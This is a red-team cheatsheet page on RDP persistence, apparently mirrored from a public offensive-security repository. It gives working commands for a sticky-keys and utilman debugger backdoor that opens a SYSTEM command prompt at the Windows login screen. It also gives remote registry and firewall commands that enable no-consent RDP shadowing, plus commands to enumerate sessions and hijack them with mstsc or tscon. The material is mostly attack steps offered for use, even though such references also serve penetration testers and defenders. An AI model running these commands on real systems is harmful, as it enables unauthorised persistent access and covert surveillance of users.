daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

rdp-persistence.md (5023B)


      1 ---
      2 title: "RDP - Persistence"
      3 section: "Red Team"
      4 sectionSlug: "redteam"
      5 sourcePath: "docs/redteam/persistence/rdp-persistence.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/persistence/rdp-persistence.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # RDP - Persistence
     12 
     13 ## RDP Backdoor
     14 
     15 An RDP backdoor is a malicious technique where an attacker replaces the legitimate binary files of utility manager (utilman.exe) or sticky keys (sethc.exe) with a command prompt (cmd.exe) executable. This allows the attacker to gain unauthorized access to the system by launching a command prompt when the ease of access or sticky keys button is pressed on the login screen, bypassing the need for authentic credentials.
     16 
     17 ### utilman.exe
     18 
     19 At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.
     20 
     21 ```powershell
     22 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
     23 ```
     24 
     25 ### sethc.exe
     26 
     27 Hit F5 a bunch of times when you are at the RDP login screen.
     28 
     29 ```powershell
     30 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
     31 ```
     32 
     33 ## RDP Shadowing
     34 
     35 RDP shadowing is a feature of Remote Desktop Protocol (RDP) that allows a remote user to view or control another user's active RDP session on a Windows computer. This feature is typically used for remote assistance, training, or collaboration purposes, allowing one user to observe or take control of another user's desktop, applications, and input devices as if they were physically present at the computer.
     36 
     37 **Requirements**
     38 
     39 * `TermService` must be running
     40 
     41     ```ps1
     42     sc.exe \\MYSERVER query TermService
     43     sc.exe \\MYSERVER start TermService
     44     ```
     45 
     46 * `SYSTEM` privilege or the account's password
     47 
     48 **Enable RDP Shadowing**
     49 
     50 Shadow Remote Desktop Session can be enabled by editing the `HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services` registry key.
     51 
     52 | Value | Name                  | Description                                                                                                                                |
     53 | ----- | --------------------- | ------------------------------------------------------------------------------------------------------------------------------------------ |
     54 | 0     | Disable               | Remote control is disabled.                                                                                                                |
     55 | 1     | EnableInputNotify     | The user of remote control has full control of the user's session, with the user's permission.                                             |
     56 | 2     | EnableInputNoNotify   | The user of remote control has full control of the user's session; the user's permission is not required.                                  |
     57 | 3     | EnableNoInputNotify   | The user of remote control can view the session remotely, with the user's permission; the remote user cannot actively control the session. |
     58 | 4     | EnableNoInputNoNotify | The user of remote control can view the session remotely, but not actively control the session; the user's permission is not required.     |
     59 
     60 Usually you want to be able to see and interact with the Remote Desktop: option 2 `EnableInputNoNotify`.
     61 
     62 ```ps1
     63 reg.exe query "\\MYSERVER\HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services" /V Shadow
     64 reg.exe add "\\MYSERVER\HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services" /V Shadow /T REG_DWORD /D 2 /F
     65 ```
     66 
     67 If you encounter any trouble with the network, enable the `Remote Desktop - Shadow (TCP-In)` firewall rule.
     68 
     69 ```ps1
     70 $so = New-CimSessionOption -Protocol Dcom
     71 $s = New-CimSession -ComputerName MYSERVER -SessionOption $so
     72 $fwrule = Get-CimInstance -Namespace ROOT\StandardCimv2 -ClassName MSFT_NetFirewallRule -Filter 'DisplayName="Remote Desktop - Shadow (TCP-In)"' -CimSession $s
     73 $fwrule | Invoke-CimMethod -MethodName Enable
     74 ```
     75 
     76 **Enumerate active users**
     77 
     78 Query to enumerate active users on the machine.
     79 
     80 ```ps1
     81 quser.exe /SERVER:MYSERVER
     82 query.exe user /server:MYSERVER
     83 qwinsta.exe /server:MYSERVER
     84 ```
     85 
     86 **Use the shadow mode**
     87 
     88 Use the `noConsentPrompt` parameter and specify the session ID obtained from the previous command.
     89 
     90 ```ps1
     91 MSTSC [/v:<server[:port]>] /shadow:<sessionID> [/control] [/noConsentPrompt]
     92 mstsc /v:SRV2016 /shadow:1 /noConsentPrompt
     93 mstsc /v:SRV2016 /shadow:1 /noConsentPrompt /control
     94 ```
     95 
     96 On older version you have to use  `tscon.exe` instead.
     97 
     98 ```ps1
     99 psexec -s cmd
    100 cmd /k tscon 2 /dest:console
    101 ```
    102 
    103 ## References
    104 
    105 * [Spying on users using Remote Desktop Shadowing - Living off the Land - Mar 26, 2021 - @bitsadmin](https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing)
    106 * [RDP Hijacking for Lateral Movement with tscon - ired.team - 2019](https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement)